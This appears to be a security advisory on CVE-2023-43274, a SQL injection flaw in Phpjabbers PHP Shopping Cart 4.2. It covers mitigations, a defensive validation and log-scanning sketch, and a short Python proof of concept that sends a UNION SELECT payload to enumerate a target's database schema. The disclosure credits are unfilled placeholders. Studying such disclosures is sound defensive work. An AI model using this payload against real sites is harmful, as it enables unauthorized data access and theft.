CVE-2023-43274: SQL Injection Vulnerability in Phpjabbers PHP Shopping Cart 4.2

A critical vulnerability has been discovered in the widely used Phpjabbers PHP Shopping Cart 4.2. Dubbed CVE-2023-43274, this vulnerability poses a significant risk to the security and integrity of websites using this software package. If exploited, an attacker could potentially execute malicious SQL queries and access sensitive information, such as user data, without appropriate permissions to do so.

Exploit Details

The flaw is rooted in improper handling of user input in the "id" parameter, which leaves the application open to SQL Injection (SQLi) attacks. It affects the getProducts() function in the ShoppingCart.php file, where the "id" parameter comes directly from user input. The full SQL query is then built and executed without proper input validation.

Proof of Concept (PoC) Code Snippet

The following code snippet demonstrates how an attacker could perform a SQLi exploit on a target website.

import requests

target_url = 'http://TARGET_WEBSITE/ShoppingCart.php'

# Send the malicious SQL query as the id parameter
payload = {'id': "1 UNION SELECT column_name, table_name FROM information_schema.columns;"}

response = requests.get(target_url, params=payload)
print(response.text)

With this simple code, an attacker could retrieve column and table names from the target website's database, potentially leading to further attacks and data exfiltration.

Original References

The vulnerability was first disclosed by [Original Discloser] on [Disclosure Date].

Mitigation and Recommendations

Until a patch is released, or if it's impractical to upgrade, users running Phpjabbers PHP Shopping Cart 4.2 or earlier should take these precautions:

1. Implement proper user input validation for the "id" parameter. Additionally, consider the use of prepared statements with parameterized queries to defend against SQLi attacks.

2. Restrict access and permissions to database accounts, ensuring only authorized and trusted entities have permission to execute SQL queries.

3. Regularly update all software packages, including the PHP Shopping Cart, as patches may be released to address this vulnerability.

4. Monitor your website and database activity for any indications of unauthorized access or suspicious activity.
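Recommendations 1 and 4 can share one strict check on the "id" value. The sketch below is an added example, not code from Phpjabbers or from the original advisory. The products table, the SQLite stand-in database, the integer-only id format, the access-log layout and the function names are all assumptions made for illustration.

```python
import re
import sqlite3
from urllib.parse import urlsplit, parse_qs

ID_RE = re.compile(r"[0-9]{1,10}")  # assumption: ids are short decimal integers

def parse_id(raw):
    """Return the id as an int, or None unless it is a plain decimal integer."""
    return int(raw) if isinstance(raw, str) and ID_RE.fullmatch(raw) else None

def get_products(conn, raw_id):
    """Validate the id, then bind it as a parameter instead of concatenating it."""
    product_id = parse_id(raw_id)
    if product_id is None:
        raise ValueError("rejected id parameter")
    sql = "SELECT id, name FROM products WHERE id = ?"
    return conn.execute(sql, (product_id,)).fetchall()

def suspicious_requests(log_lines, path="/ShoppingCart.php"):
    """Return access-log lines whose id parameter fails the same validation."""
    flagged = []
    for line in log_lines:
        m = re.search(r'"(?:GET|POST) (\S+) HTTP', line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        ids = parse_qs(url.query, keep_blank_values=True).get("id", [])
        if url.path == path and any(parse_id(v) is None for v in ids):
            flagged.append(line)
    return flagged

def demo_db():
    """Constructed in-memory table standing in for the shop's product table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT)")
    conn.execute("INSERT INTO products VALUES (1, 'Mug'), (2, 'Poster')")
    return conn

# Constructed log lines; the second carries the URL-encoded PoC value from above.
SAMPLE_LOG = [
    '198.51.100.4 - - [21/Sep/2023:14:19:58 +0000] "GET /ShoppingCart.php?id=2 HTTP/1.1" 200 812',
    '203.0.113.7 - - [21/Sep/2023:14:20:01 +0000] "GET /ShoppingCart.php?id=1+UNION+SELECT+'
    'column_name%2C+table_name+FROM+information_schema.columns%3B HTTP/1.1" 200 5120',
    '198.51.100.4 - - [21/Sep/2023:14:20:09 +0000] "GET /index.php?id=abc HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    print(get_products(demo_db(), "2"))
    print(suspicious_requests(SAMPLE_LOG))
```

Flagged lines are a starting point for review: a 200 response with an unusually large body on a rejected-format id is worth checking against database logs.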

Conclusion

CVE-2023-43274 is a serious SQL Injection vulnerability affecting users of Phpjabbers PHP Shopping Cart 4.2. Although no official patch has been released, website administrators using this software should heed the recommendations provided in this article to guard against potential attacks. Please share this information with other developers and administrators to ensure the safety and security of the web.

Timeline

Published on: 09/21/2023 14:15:10 UTC
Last modified on: 09/22/2023 02:15:02 UTC